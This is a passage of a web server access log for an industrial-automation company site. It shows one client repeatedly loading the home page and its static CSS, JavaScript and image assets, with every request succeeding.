"https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:13:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:13:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20867] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:13:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:13:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:13:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:13:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:13:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:13:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:18:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10342] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:00:18:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:18:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:18:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:18:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:18:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:18:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:18:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20867] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:18:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:18:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:18:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:18:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:18:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:18:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:26:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10339] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:00:26:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:26:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:26:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:26:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:26:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:26:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:26:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20867] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:26:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:26:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:26:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:26:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:26:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:26:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:31:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10339] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:00:31:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:31:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:31:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:31:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:31:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:31:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:31:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:31:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:31:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:31:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:31:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:31:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:31:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:38:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10339] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:00:38:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:38:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:38:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:38:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:38:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:38:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:38:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:38:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:38:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:38:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:38:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:38:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:38:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:38:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10339] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:00:38:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:38:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:38:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:38:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:38:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:38:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:38:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:38:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:38:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:38:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:38:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:38:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:38:57 +0000] - 200 200 - 